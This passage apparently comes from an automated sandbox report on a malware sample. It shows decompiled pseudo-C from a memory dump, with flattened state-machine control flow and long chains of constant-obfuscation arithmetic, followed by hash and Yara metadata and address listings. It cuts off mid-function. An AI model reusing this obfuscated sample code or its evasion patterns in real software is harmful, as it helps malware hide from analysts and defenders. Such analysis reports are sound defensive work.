                                              				_v236 = 0x69d3;
                                              				_t515 = 0x5a;
                                              				_v236 = _v236 / _t515;
                                              				_v236 = _v236 >> 0xf;
                                              				_v236 = _v236 ^ 0x000046bd;
                                              				_v268 = 0x8cb9;
                                              				_v268 = _v268 + 0xffff2c59;
                                              				_v268 = _v268 << 4;
                                              				_v268 = _v268 << 2;
                                              				_v268 = _v268 ^ 0xffee6fc7;
                                              				_v284 = 0x8a1;
                                              				_v284 = _v284 ^ 0x358a3729;
                                              				_v284 = _v284 << 4;
                                              				_v284 = _v284 + 0xde3b;
                                              				_v284 = _v284 ^ 0x58a4aa69;
                                              				_v264 = 0x360c;
                                              				_v264 = _v264 ^ 0xc2d2005c;
                                              				_v264 = _v264 << 6;
                                              				_t516 = 0x32;
                                              				_v264 = _v264 * 0x5c;
                                              				_v264 = _v264 ^ 0xe2e17670;
                                              				_v180 = 0x8be;
                                              				_v180 = _v180 | 0xafaf70c7;
                                              				_v180 = _v180 ^ 0xafaf5d0a;
                                              				_v168 = 0x59fe;
                                              				_v168 = _v168 << 0xd;
                                              				_v168 = _v168 ^ 0x0b3f82ad;
                                              				_v188 = 0x197e;
                                              				_v188 = _v188 << 4;
                                              				_v188 = _v188 ^ 0x0001c80c;
                                              				_v256 = 0x542a;
                                              				_v256 = _v256 + 0x92cc;
                                              				_v256 = _v256 | 0xa238a407;
                                              				_v256 = _v256 ^ 0xa2389846;
                                              				_v224 = 0x7627;
                                              				_v224 = _v224 + 0xdff4;
                                              				_v224 = _v224 ^ 0x000122df;
                                              				_v316 = 0x3ece;
                                              				_v316 = _v316 * 0x74;
                                              				_v316 = _v316 >> 8;
                                              				_v316 = _v316 | 0xc6a89cdb;
                                              				_v316 = _v316 ^ 0xc6a8f635;
                                              				_v244 = 0x10d9;
                                              				_v244 = _v244 | 0xf517e732;
                                              				_v244 = _v244 + 0x5e6f;
                                              				_v244 = _v244 ^ 0xf518070f;
                                              				_v160 = 0xb68b;
                                              				_v160 = _v160 >> 7;
                                              				_v160 = _v160 ^ 0x00003a74;
                                              				_v276 = 0x3579;
                                              				_v276 = _v276 | 0x431a7672;
                                              				_v276 = _v276 << 2;
                                              				_v276 = _v276 / _t516;
                                              				_v276 = _v276 ^ 0x003ff326;
                                              				_v216 = 0xcfb7;
                                              				_t517 = 0x63;
                                              				_v216 = _v216 / _t517;
                                              				_v216 = _v216 ^ 0x00003917;
                                              				_v312 = 0xd3b7;
                                              				_v312 = _v312 ^ 0x43b1e200;
                                              				_v312 = _v312 << 8;
                                              				_t518 = 0x70;
                                              				_v312 = _v312 / _t518;
                                              				_v312 = _v312 ^ 0x01952af0;
                                              				_v248 = 0xe683;
                                              				_v248 = _v248 | 0xeb182d0f;
                                              				_v248 = _v248 + 0xcf0c;
                                              				_v248 = _v248 ^ 0xeb19e4ec;
                                              				_v204 = 0xada2;
                                              				_v204 = _v204 >> 0x10;
                                              				_v204 = _v204 ^ 0x000009df;
                                              				_v152 = 0xb32a;
                                              				_v152 = _v152 + 0xffff4f9d;
                                              				_v152 = _v152 ^ 0x00004085;
                                              				_v212 = 0xbe4c;
                                              				_t531 = _a4;
                                              				_v212 = _v212 * 5;
                                              				_v212 = _v212 ^ 0x00039e07;
                                              				_v280 = 0xc7f7;
                                              				_v280 = _v280 | 0xad7c9e6f;
                                              				_v280 = _v280 * 0x1c;
                                              				_v280 = _v280 | 0xde3ec68b;
                                              				_v280 = _v280 ^ 0xffbea491;
                                              				_v240 = 0x8de7;
                                              				_v240 = _v240 * 0x45;
                                              				_t463 = _v140;
                                              				_v240 = _v240 / _t462;
                                              				_v240 = _v240 ^ 0x00019f2b;
                                              				_v304 = 0x16f;
                                              				_v304 = _v304 | 0xdf403998;
                                              				_v304 = _v304 ^ 0x6a41af55;
                                              				_v304 = _v304 | 0x5f7c1de9;
                                              				_v304 = _v304 ^ 0xff7dd65d;
                                              				_v208 = 0xa25a;
                                              				_v208 = _v208 / _t518;
                                              				_v208 = _v208 ^ 0x00007fd0;
                                              				_v184 = 0x444f;
                                              				_t519 = 0x26;
                                              				_v184 = _v184 * 0x7d;
                                              				_v184 = _v184 ^ 0x002171af;
                                              				_v192 = 0x6191;
                                              				_v192 = _v192 << 6;
                                              				_v192 = _v192 ^ 0x00185c0b;
                                              				_v200 = 0x9864;
                                              				_v200 = _v200 / _t519;
                                              				_v200 = _v200 ^ 0x0000693d;
                                              				_v232 = 0xae1;
                                              				_v232 = _v232 ^ 0x7986b26b;
                                              				_t520 = 0x49;
                                              				_t521 = _v140;
                                              				_v232 = _v232 / _t520;
                                              				_v232 = _v232 ^ 0x01aa59fa;
                                              				_v176 = 0xf7eb;
                                              				_v176 = _v176 * 0x67;
                                              				_v176 = _v176 ^ 0x0063e620;
                                              				_v296 = 0x2b09;
                                              				_v296 = _v296 + 0xffffdaa4;
                                              				_v296 = _v296 | 0x1659e70b;
                                              				_v296 = _v296 ^ 0x3abae7e6;
                                              				_v296 = _v296 ^ 0x2ce32170;
                                              				while(_t522 != 0xa551406) {
                                              					if(_t522 == 0x10f51287) {
                                              						E00232674(_v204, _v152,  *((intOrPtr*)(_t466 + 4)), _t521, _v212, _v280,  *_t466);
                                              						_t466 = _v144;
                                              						_t532 =  &(_t532[5]);
                                              						_t522 = 0x3013e9c6;
                                              						_t521 = _t521 +  *((intOrPtr*)(_t466 + 4));
                                              						continue;
                                              					}
                                              					if(_t522 == 0x14284095) {
                                              						_t522 = 0x28f75045;
                                              						_a4 =  *((intOrPtr*)(_t466 + 4)) + 0x1000;
                                              						continue;
                                              					}
                                              					if(_t522 == 0x1b8692db) {
                                              						_v148 = E00238C8F(_t466);
                                              						_t522 = 0x14284095;
                                              						L10:
                                              						_t466 = _v144;
                                              						continue;
                                              					}
                                              					if(_t522 == 0x28f75045) {
                                              						_push(_t466);
                                              						_push(_t466);
                                              						_t521 = E00228736(_a4);
                                              						 *_t531 = _t521;
                                              						__eflags = _t521;
                                              						if(_t521 == 0) {
                                              							L16:
                                              							__eflags = 0;
                                              							return 0;
                                              						}
                                              						_t522 = 0xa551406;
                                              						_t463 = _a4 + _t521;
                                              						__eflags = _a4 + _t521;
                                              						goto L10;
                                              					}
                                              					_t541 = _t522 - 0x3013e9c6;
                                              					if(_t522 != 0x3013e9c6) {
                                              						L15:
                                              						__eflags = _t522 - 0x28249ddd;
                                              						if(__eflags != 0) {
                                              							continue;
                                              						}
                                              						goto L16;
                                              					}
                                              					_push(0x23c7a0);
                                              					_push(_v208);
                                              					E00227F4B(_t521, E0023878F(_v240, _v304, _t541), _v184, _v140, _v192, _v200);
                                              					E00232025(_v232, _t457, _v176, _v296);
                                              					return 1;
                                              				}
                                              				_t525 = (E0022EDCF(_v260, _v164,  &_v148, _v300) & 0x0000000f) + 4;
                                              				E0022B605( &_v64,  &_v148, _t525, _v252, _v196, _v272);
                                              				_t373 =  &_v292; // 0xe2e17670
                                              				 *((char*)(_t532 + _t525 + 0x130)) = 0;
                                              				_t528 = (E0022EDCF(_v156,  *_t373,  &_v148, _v236) & 0x0000000f) + 4;
                                              				E0022B605( &_v128,  &_v148, _t528, _v268, _v284, _v264);
                                              				_push(0x23c710);
                                              				_push(_v188);
                                              				 *((char*)(_t532 + _t528 + 0x10c)) = 0;
                                              				_t521 = _t521 + E002211C1( &_v64, _v224, _v316,  &_v128, _v140, _t521, _v244, _v160, _t463 - _t521, E0023878F(_v180, _v168, __eflags), _v276);
                                              				__eflags = _t521;
                                              				E00232025(_v216, _t440, _v312, _v248);
                                              				_t466 = _v144;
                                              				_t532 =  &(_t532[0x1c]);
                                              				_t522 = 0x10f51287;
                                              				goto L15;
                                              			}

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: %$ c$'v$*T$0)$=i$OD$o^$p!,$pv$r{$t:$y5$|uQa
                                              • API String ID: 0-2620103065
                                              • Opcode ID: eb78cce5d490038e1887581b56f9f3ed37a1a8038c33a47271346ff23e76988f
                                              • Instruction ID: 48333913d89a0d631b143025593600d25302548684c6767f6496242d78cea238
                                              • Opcode Fuzzy Hash: eb78cce5d490038e1887581b56f9f3ed37a1a8038c33a47271346ff23e76988f
                                              • Instruction Fuzzy Hash: 09222371508380DFE364CF25C58AA8BFBE2BBC4748F108A1DE5D9962A1D7B58949CF43
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 92%
                                              			E00224A35(intOrPtr __ecx, signed int __edx) {
                                              				char _v524;
                                              				char _v1044;
                                              				char _v1564;
                                              				intOrPtr _v1568;
                                              				intOrPtr _v1572;
                                              				char _v1576;
                                              				intOrPtr _v1580;
                                              				char _v1584;
                                              				intOrPtr _v1588;
                                              				signed int _v1592;
                                              				signed int _v1596;
                                              				signed int _v1600;
                                              				signed int _v1604;
                                              				signed int _v1608;
                                              				signed int _v1612;
                                              				signed int _v1616;
                                              				signed int _v1620;
                                              				signed int _v1624;
                                              				signed int _v1628;
                                              				signed int _v1632;
                                              				unsigned int _v1636;
                                              				signed int _v1640;
                                              				signed int _v1644;
                                              				signed int _v1648;
                                              				signed int _v1652;
                                              				signed int _v1656;
                                              				signed int _v1660;
                                              				signed int _v1664;
                                              				signed int _v1668;
                                              				signed int _v1672;
                                              				signed int _v1676;
                                              				signed int _v1680;
                                              				signed int _v1684;
                                              				signed int _v1688;
                                              				signed int _v1692;
                                              				signed int _v1696;
                                              				signed int _v1700;
                                              				signed int _v1704;
                                              				signed int _v1708;
                                              				signed int _v1712;
                                              				signed int _v1716;
                                              				signed int _v1720;
                                              				signed int _v1724;
                                              				signed int _v1728;
                                              				signed int _v1732;
                                              				signed int _v1736;
                                              				signed int _v1740;
                                              				signed int _v1744;
                                              				signed int _v1748;
                                              				signed int _v1752;
                                              				signed int _v1756;
                                              				signed int _v1760;
                                              				signed int _v1764;
                                              				signed int _v1768;
                                              				signed int _v1772;
                                              				signed int _v1776;
                                              				signed int _v1780;
                                              				signed int _v1784;
                                              				signed int _v1788;
                                              				signed int _v1792;
                                              				signed int _v1796;
                                              				signed int _v1800;
                                              				void* _t474;
                                              				void* _t475;
                                              				signed int _t479;
                                              				signed int _t491;
                                              				signed int _t496;
                                              				signed int _t500;
                                              				signed int _t510;
                                              				signed int _t511;
                                              				signed int _t512;
                                              				signed int _t513;
                                              				signed int _t514;
                                              				signed int _t515;
                                              				void* _t520;
                                              				signed int _t524;
                                              				void* _t530;
                                              				void* _t532;
                                              				signed int _t572;
                                              				signed int _t573;
                                              				signed int _t574;
                                              				signed int _t575;
                                              				void* _t579;
                                              				void* _t580;
                                              				void* _t582;
                                              
                                              				_v1628 = 0xed3;
                                              				_v1628 = _v1628 + 0xd002;
                                              				_v1628 = _v1628 ^ 0x0000defc;
                                              				_v1796 = 0x50e8;
                                              				_v1796 = _v1796 + 0xffffea13;
                                              				_v1796 = _v1796 >> 0xe;
                                              				_v1796 = _v1796 ^ 0x3dc2eaa9;
                                              				_v1796 = _v1796 ^ 0x3dc2b05a;
                                              				_v1604 = 0xecd0;
                                              				_v1604 = _v1604 << 0xd;
                                              				_v1604 = _v1604 ^ 0x1d9a54ec;
                                              				_v1636 = 0xad8d;
                                              				_v1636 = _v1636 >> 0xc;
                                              				_v1636 = _v1636 ^ 0x000019e2;
                                              				_v1600 = 0x1846;
                                              				_v1592 = __edx;
                                              				_t574 = 0x4762904;
                                              				_v1588 = __ecx;
                                              				_t510 = 0x63;
                                              				_v1600 = _v1600 / _t510;
                                              				_v1600 = _v1600 ^ 0x00006484;
                                              				_v1740 = 0xfd34;
                                              				_v1740 = _v1740 ^ 0x1b9865fd;
                                              				_v1740 = _v1740 ^ 0xced01448;
                                              				_v1740 = _v1740 ^ 0xd548e885;
                                              				_v1684 = 0x582a;
                                              				_t572 = 0x3b;
                                              				_v1684 = _v1684 / _t572;
                                              				_v1684 = _v1684 ^ 0x000016a0;
                                              				_v1724 = 0x2b60;
                                              				_t511 = 0x34;
                                              				_v1724 = _v1724 / _t511;
                                              				_v1724 = _v1724 ^ 0xf4396e09;
                                              				_v1724 = _v1724 ^ 0xf4397db5;
                                              				_v1732 = 0x220f;
                                              				_v1732 = _v1732 ^ 0x234d952a;
                                              				_v1732 = _v1732 >> 1;
                                              				_v1732 = _v1732 ^ 0x11a6b27c;
                                              				_v1616 = 0x4d57;
                                              				_v1616 = _v1616 << 0xb;
                                              				_v1616 = _v1616 ^ 0x026acda8;
                                              				_v1672 = 0x3d68;
                                              				_v1672 = _v1672 + 0xffff611f;
                                              				_v1672 = _v1672 ^ 0xffff811c;
                                              				_v1800 = 0xf339;
                                              				_v1800 = _v1800 + 0xfffff0f7;
                                              				_v1800 = _v1800 + 0x895c;
                                              				_v1800 = _v1800 + 0xc572;
                                              				_v1800 = _v1800 ^ 0x000271c2;
                                              				_v1664 = 0x37c5;
                                              				_v1664 = _v1664 + 0xffffa7ba;
                                              				_v1664 = _v1664 ^ 0xffffa1b5;
                                              				_v1632 = 0xc51c;
                                              				_v1632 = _v1632 >> 4;
                                              				_v1632 = _v1632 ^ 0x00001093;
                                              				_v1640 = 0x76f9;
                                              				_v1640 = _v1640 ^ 0x9fffdcc0;
                                              				_v1640 = _v1640 ^ 0x9fff82e4;
                                              				_v1648 = 0x8076;
                                              				_v1648 = _v1648 * 7;
                                              				_v1648 = _v1648 ^ 0x0003a5e4;
                                              				_v1708 = 0x21bc;
                                              				_v1708 = _v1708 + 0xc05f;
                                              				_v1708 = _v1708 << 6;
                                              				_v1708 = _v1708 ^ 0x0038a40f;
                                              				_v1784 = 0xa89a;
                                              				_v1784 = _v1784 / _t572;
                                              				_v1784 = _v1784 + 0xffffeb30;
                                              				_v1784 = _v1784 << 0xa;
                                              				_v1784 = _v1784 ^ 0xffb86208;
                                              				_v1656 = 0x5b43;
                                              				_v1656 = _v1656 ^ 0xe62d1ba2;
                                              				_v1656 = _v1656 ^ 0xe62d5436;
                                              				_v1792 = 0x5d3e;
                                              				_v1792 = _v1792 >> 5;
                                              				_v1792 = _v1792 + 0xfffff433;
                                              				_v1792 = _v1792 ^ 0x1afa5a2f;
                                              				_v1792 = _v1792 ^ 0xe50594ef;
                                              				_v1680 = 0x9f3f;
                                              				_v1680 = _v1680 + 0xfffff3b1;
                                              				_v1680 = _v1680 ^ 0x0000dcc5;
                                              				_v1780 = 0x8a4e;
                                              				_v1780 = _v1780 >> 0xc;
                                              				_v1780 = _v1780 + 0x10e4;
                                              				_v1780 = _v1780 ^ 0x817594c9;
                                              				_v1780 = _v1780 ^ 0x81758ecd;
                                              				_v1748 = 0xbeb1;
                                              				_v1748 = _v1748 | 0x408b0c07;
                                              				_v1748 = _v1748 + 0xffff7379;
                                              				_v1748 = _v1748 ^ 0x408b5cad;
                                              				_v1752 = 0xb76f;
                                              				_v1752 = _v1752 >> 0xe;
                                              				_t512 = 0x23;
                                              				_v1752 = _v1752 / _t512;
                                              				_v1752 = _v1752 ^ 0x000011f4;
                                              				_v1652 = 0x783b;
                                              				_v1652 = _v1652 ^ 0xf6ea495a;
                                              				_v1652 = _v1652 ^ 0xf6ea4537;
                                              				_v1788 = 0x701e;
                                              				_v1788 = _v1788 | 0x54ae9efd;
                                              				_v1788 = _v1788 >> 0xa;
                                              				_v1788 = _v1788 + 0x818c;
                                              				_v1788 = _v1788 ^ 0x0015b45a;
                                              				_v1756 = 0xfc95;
                                              				_t513 = 0x4e;
                                              				_v1756 = _v1756 / _t513;
                                              				_v1756 = _v1756 | 0x6e3e6587;
                                              				_v1756 = _v1756 ^ 0x6e3e48c8;
                                              				_v1720 = 0xc52f;
                                              				_v1720 = _v1720 >> 5;
                                              				_v1720 = _v1720 << 2;
                                              				_v1720 = _v1720 ^ 0x00007c98;
                                              				_v1620 = 0xf570;
                                              				_v1620 = _v1620 >> 0xa;
                                              				_v1620 = _v1620 ^ 0x00006ca8;
                                              				_v1712 = 0x65f6;
                                              				_v1712 = _v1712 | 0x8fa1cc9c;
                                              				_v1712 = _v1712 >> 9;
                                              				_v1712 = _v1712 ^ 0x0047fc5c;
                                              				_v1676 = 0xb942;
                                              				_v1676 = _v1676 * 0x15;
                                              				_v1676 = _v1676 ^ 0x000f4c8d;
                                              				_v1736 = 0x950a;
                                              				_v1736 = _v1736 | 0x9f71954d;
                                              				_v1736 = _v1736 + 0xffff5dd1;
                                              				_v1736 = _v1736 ^ 0x9f70c3f6;
                                              				_v1704 = 0xd0f3;
                                              				_v1704 = _v1704 + 0xffff53c3;
                                              				_v1704 = _v1704 ^ 0xce9fbdc0;
                                              				_v1704 = _v1704 ^ 0xce9f87f0;
                                              				_v1596 = 0x1518;
                                              				_v1596 = _v1596 + 0x85a2;
                                              				_v1596 = _v1596 ^ 0x000083d8;
                                              				_v1668 = 0x64f;
                                              				_v1668 = _v1668 + 0xffff0b06;
                                              				_v1668 = _v1668 ^ 0xffff3669;
                                              				_v1728 = 0x3b1d;
                                              				_v1728 = _v1728 + 0x874c;
                                              				_v1728 = _v1728 | 0x620470b3;
                                              				_v1728 = _v1728 ^ 0x6204e551;
                                              				_v1696 = 0x2df9;
                                              				_v1696 = _v1696 << 0xf;
                                              				_v1696 = _v1696 >> 4;
                                              				_v1696 = _v1696 ^ 0x016fb4ca;
                                              				_v1764 = 0xcc6;
                                              				_v1764 = _v1764 | 0x8d34f989;
                                              				_t514 = 0x74;
                                              				_v1764 = _v1764 / _t514;
                                              				_t515 = 0x18;
                                              				_v1764 = _v1764 * 0x6c;
                                              				_v1764 = _v1764 ^ 0x8377a340;
                                              				_v1608 = 0x20b8;
                                              				_v1608 = _v1608 + 0xffffe23d;
                                              				_v1608 = _v1608 ^ 0x000040ba;
                                              				_v1660 = 0xbd08;
                                              				_v1660 = _v1660 | 0x92c929d6;
                                              				_v1660 = _v1660 ^ 0x92c9e2c3;
                                              				_v1644 = 0x1738;
                                              				_v1644 = _v1644 + 0x2a2d;
                                              				_v1644 = _v1644 ^ 0x00007d9b;
                                              				_v1772 = 0x814c;
                                              				_v1772 = _v1772 * 0x2f;
                                              				_v1772 = _v1772 ^ 0x2fd35c8b;
                                              				_v1772 = _v1772 << 9;
                                              				_v1772 = _v1772 ^ 0x89c0ce59;
                                              				_v1612 = 0xaccd;
                                              				_v1612 = _v1612 << 0xb;
                                              				_v1612 = _v1612 ^ 0x05662888;
                                              				_v1624 = 0x6919;
                                              				_v1624 = _v1624 >> 0xb;
                                              				_v1624 = _v1624 ^ 0x00005c9e;
                                              				_v1768 = 0x2455;
                                              				_v1768 = _v1768 ^ 0xee213c0c;
                                              				_v1768 = _v1768 + 0xffffdbe3;
                                              				_v1768 = _v1768 >> 6;
                                              				_v1768 = _v1768 ^ 0x03b8b908;
                                              				_v1776 = 0x634b;
                                              				_v1776 = _v1776 << 3;
                                              				_v1776 = _v1776 * 0x44;
                                              				_v1776 = _v1776 + 0xffff5e24;
                                              				_v1776 = _v1776 ^ 0x00d21830;
                                              				_v1688 = 0xdff8;
                                              				_v1688 = _v1688 ^ 0x1c92e1a2;
                                              				_v1688 = _v1688 ^ 0x1c9257de;
                                              				_v1744 = 0xd5b6;
                                              				_v1744 = _v1744 << 7;
                                              				_v1744 = _v1744 ^ 0x97cdeac8;
                                              				_v1744 = _v1744 ^ 0x97a72039;
                                              				_v1692 = 0x89ed;
                                              				_v1692 = _v1692 + 0xffff6a89;
                                              				_v1692 = _v1692 | 0xb25fce0e;
                                              				_v1692 = _v1692 ^ 0xfffff10e;
                                              				_v1700 = 0xa1e5;
                                              				_v1700 = _v1700 * 0x2a;
                                              				_v1700 = _v1700 + 0xffff21dd;
                                              				_v1700 = _v1700 ^ 0x00199ee5;
                                              				_v1760 = 0x2165;
                                              				_v1760 = _v1760 + 0xb9ba;
                                              				_v1760 = _v1760 / _t515;
                                              				_v1760 = _v1760 * 0x41;
                                              				_v1760 = _v1760 ^ 0x000227fb;
                                              				_v1716 = 0x5b5d;
                                              				_v1716 = _v1716 | 0x7b7605fc;
                                              				_v1716 = _v1716 >> 5;
                                              				_v1716 = _v1716 ^ 0x03cbb2ff;
                                              				_t474 = E00236D44(_t515);
                                              				_t573 = _v1592;
                                              				_t579 = _t474;
                                              				_t508 = _v1592;
                                              				while(1) {
                                              					L1:
                                              					_t475 = 0x1359b45f;
                                              					do {
                                              						while(1) {
                                              							L2:
                                              							_t582 = _t574 - 0x1dbe7493;
                                              							if(_t582 > 0) {
                                              								break;
                                              							}
                                              							if(_t582 == 0) {
                                              								return E0022F536(_v1692, _v1700, _v1760, _t573);
                                              							}
                                              							if(_t574 != 0x4762904) {
                                              								if(_t574 == 0x589c6e4) {
                                              									E0022F536(_v1644, _v1772, _v1612, _t508);
                                              									_pop(_t524);
                                              									_t574 = 0x1e3f4be6;
                                              									while(1) {
                                              										L1:
                                              										_t475 = 0x1359b45f;
                                              										goto L2;
                                              									}
                                              								} else {
                                              									if(_t574 == 0xb2e7f16) {
                                              										_t524 = _v1748;
                                              										_t500 = E00231773(_v1752, _v1584, _v1580, _v1652, _v1788);
                                              										_t508 = _t500;
                                              										_t580 = _t580 + 0x10;
                                              										__eflags = _t500;
                                              										_t475 = 0x1359b45f;
                                              										_t574 =  !=  ? 0x1359b45f : 0x1e3f4be6;
                                              										continue;
                                              									} else {
                                              										if(_t574 == 0xbe4541e) {
                                              											_push(_t524);
                                              											_push(_v1660);
                                              											_push(0);
                                              											_push(_v1608);
                                              											_push(0);
                                              											_push(_v1764);
                                              											_t524 = _v1696;
                                              											_push( &_v1564);
                                              											E0022568E(_t524, 1);
                                              											_t580 = _t580 + 0x1c;
                                              											_t574 = 0x589c6e4;
                                              											while(1) {
                                              												L1:
                                              												_t475 = 0x1359b45f;
                                              												goto L2;
                                              											}
                                              										} else {
                                              											if(_t574 == _t475) {
                                              												_push(_v1720);
                                              												E002229E3( &_v524, 0x104, E0023889D(0x23c8a0, _v1756, __eflags), _v1620, _v1712, _v1676, _t508,  &_v1564, _v1736, _v1704);
                                              												_t580 = _t580 + 0x24;
                                              												E00232025(_v1596, _t503, _v1668, _v1728);
                                              												_pop(_t524);
                                              												_t574 = 0xbe4541e;
                                              												while(1) {
                                              													L1:
                                              													_t475 = 0x1359b45f;
                                              													goto L2;
                                              												}
                                              											} else {
                                              												if(_t574 != 0x1d7e83db) {
                                              													goto L29;
                                              												} else {
                                              													E00234F7D(_v1688, _v1744, _v1576);
                                              													_pop(_t524);
                                              													_t574 = 0x3025b1cf;
                                              													while(1) {
                                              														L1:
                                              														_t475 = 0x1359b45f;
                                              														goto L2;
                                              													}
                                              												}
                                              											}
                                              										}
                                              									}
                                              								}
                                              								L23:
                                              								return _t496;
                                              							}
                                              							_push(_t524);
                                              							_t530 = 0x38;
                                              							_t496 = E00228736(_t530);
                                              							_t573 = _t496;
                                              							_t532 = _t524;
                                              							__eflags = _t573;
                                              							if(_t573 != 0) {
                                              								_push(_t532);
                                              								_push(_t532);
                                              								_t524 = _v1684;
                                              								E0022C6C7(_t524, _v1724,  &_v1044, _t532, _v1732, _v1628, _v1616);
                                              								_t580 = _t580 + 0x1c;
                                              								_t574 = 0x2d0f1252;
                                              								while(1) {
                                              									L1:
                                              									_t475 = 0x1359b45f;
                                              									goto L2;
                                              								}
                                              							}
                                              							goto L23;
                                              						}
                                              						__eflags = _t574 - 0x1e3f4be6;
                                              						if(_t574 == 0x1e3f4be6) {
                                              							E0022F536(_v1624, _v1768, _v1776, _v1584);
                                              							_t574 = 0x1d7e83db;
                                              							_t475 = 0x1359b45f;
                                              							goto L29;
                                              						} else {
                                              							__eflags = _t574 - 0x20ae1a02;
                                              							if(_t574 == 0x20ae1a02) {
                                              								_v1572 = E0023388A();
                                              								_t479 = E00230ADC(_t478, _v1800, _v1664);
                                              								_pop(_t520);
                                              								_v1568 = 2 + _t479 * 2;
                                              								E0022B35D(_t579, _t579, _v1632,  &_v1576, _t520, _v1640, _v1648, _t579, _v1708, _v1784, _v1656, _v1716, _v1792);
                                              								_t580 = _t580 + 0x30;
                                              								asm("sbb esi, esi");
                                              								_t575 = _t574 & 0x097497a8;
                                              								goto L25;
                                              							} else {
                                              								__eflags = _t574 - 0x27330c3b;
                                              								if(_t574 == 0x27330c3b) {
                                              									E002280BA( &_v1576, _v1680, _v1780,  &_v1584);
                                              									asm("sbb esi, esi");
                                              									_pop(_t524);
                                              									_t574 = (_t574 & 0xedaffb3b) + 0x1d7e83db;
                                              									goto L1;
                                              								} else {
                                              									__eflags = _t574 - 0x2d0f1252;
                                              									if(_t574 == 0x2d0f1252) {
                                              										_push( &_v524);
                                              										E002288E5(_v1588, _v1592);
                                              										asm("sbb esi, esi");
                                              										_t524 = 0x23c8f0;
                                              										_t575 = _t574 & 0x02efa56f;
                                              										__eflags = _t575;
                                              										L25:
                                              										_t574 = _t575 + 0x1dbe7493;
                                              										while(1) {
                                              											L1:
                                              											_t475 = 0x1359b45f;
                                              											goto L2;
                                              										}
                                              									} else {
                                              										__eflags = _t574 - 0x3025b1cf;
                                              										if(_t574 == 0x3025b1cf) {
                                              											 *((intOrPtr*)(_t573 + 0x24)) = _v1588;
                                              											_t491 =  *0x23ca24; // 0x0
                                              											 *(_t573 + 0x2c) = _t491;
                                              											 *0x23ca24 = _t573;
                                              											return _t491;
                                              										}
                                              										goto L29;
                                              									}
                                              								}
                                              							}
                                              						}
                                              						goto L23;
                                              						L29:
                                              						__eflags = _t574 - 0x15e8ba90;
                                              					} while (__eflags != 0);
                                              					return _t475;
                                              				}
                                              			}
                                              0x002252e9
                                              0x002252ef
                                              0x002252f0
                                              0x0022516a
                                              0x0022516a
                                              0x0022516a
                                              0x00000000
                                              0x0022516a
                                              0x00225199
                                              0x0022519f
                                              0x002252ad
                                              0x002252b8
                                              0x002252bd
                                              0x002252bf
                                              0x002252c2
                                              0x002252c9
                                              0x002252ce
                                              0x00000000
                                              0x002251a5
                                              0x002251ab
                                              0x0022525c
                                              0x0022525d
                                              0x0022526d
                                              0x0022526f
                                              0x00225277
                                              0x00225279
                                              0x0022527d
                                              0x00225284
                                              0x00225285
                                              0x0022528a
                                              0x0022528d
                                              0x0022516a
                                              0x0022516a
                                              0x0022516a
                                              0x00000000
                                              0x0022516a
                                              0x002251b1
                                              0x002251b3
                                              0x002251e0
                                              0x0022522f
                                              0x00225234
                                              0x0022524b
                                              0x00225251
                                              0x00225252
                                              0x0022516a
                                              0x0022516a
                                              0x0022516a
                                              0x00000000
                                              0x0022516a
                                              0x002251b5
                                              0x002251bb
                                              0x00000000
                                              0x002251c1
                                              0x002251d3
                                              0x002251d8
                                              0x002251d9
                                              0x0022516a
                                              0x0022516a
                                              0x0022516a
                                              0x00000000
                                              0x0022516a
                                              0x0022516a
                                              0x002251bb
                                              0x002251b3
                                              0x002251ab
                                              0x0022519f
                                              0x002253b2
                                              0x002253b2
                                              0x002253b2
                                              0x0022530c
                                              0x00225310
                                              0x00225311
                                              0x00225316
                                              0x00225319
                                              0x0022531a
                                              0x0022531c
                                              0x00225322
                                              0x00225323
                                              0x00225342
                                              0x0022534a
                                              0x0022534f
                                              0x00225352
                                              0x0022516a
                                              0x0022516a
                                              0x0022516a
                                              0x00000000
                                              0x0022516a
                                              0x0022516a
                                              0x00000000
                                              0x0022531c
                                              0x0022535c
                                              0x00225362
                                              0x002254bd
                                              0x002254c4
                                              0x002254c9
                                              0x00000000
                                              0x00225368
                                              0x00225368
                                              0x0022536e
                                              0x00225439
                                              0x00225440
                                              0x00225445
                                              0x0022545c
                                              0x00225490
                                              0x00225495
                                              0x0022549a
                                              0x0022549c
                                              0x00000000
                                              0x00225374
                                              0x00225374
                                              0x0022537a
                                              0x00225404
                                              0x0022540c
                                              0x00225414
                                              0x00225415
                                              0x00000000
                                              0x0022537c
                                              0x0022537c
                                              0x00225382
                                              0x002253c8
                                              0x002253ce
                                              0x002253d6
                                              0x002253d8
                                              0x002253d9
                                              0x002253d9
                                              0x002253df
                                              0x002253df
                                              0x0022516a
                                              0x0022516a
                                              0x0022516a
                                              0x00000000
                                              0x0022516a
                                              0x00225384
                                              0x00225384
                                              0x0022538a
                                              0x00225397
                                              0x0022539a
                                              0x0022539f
                                              0x002253a2
                                              0x00000000
                                              0x002253a2
                                              0x00000000
                                              0x0022538a
                                              0x00225382
                                              0x0022537a
                                              0x0022536e
                                              0x00000000
                                              0x002254ce
                                              0x002254ce
                                              0x002254ce
                                              0x00000000
                                              0x0022516f

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: *X$-*$6T-$;x$>]$Kc$U$$WM$][$`+$e!$h=$P
                                              • API String ID: 0-2931794159
                                              • Opcode ID: 5d56ee85ed22231856a5eba70b406ff3540e88711f137481a8a6f19e35d0ae22
                                              • Instruction ID: 4704ed8230d0f9b9165d0f56cb11c30602706cc909e46af53aafadcdae08ea3b
                                              • Opcode Fuzzy Hash: 5d56ee85ed22231856a5eba70b406ff3540e88711f137481a8a6f19e35d0ae22
                                              • Instruction Fuzzy Hash: ED323271518781DFE3B8CF61D54AA8BBBE1BBC4304F108A1DE5DA962A0D7B59819CF03
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 88%
                                              			E00228F78(intOrPtr __ecx, intOrPtr __edx) {
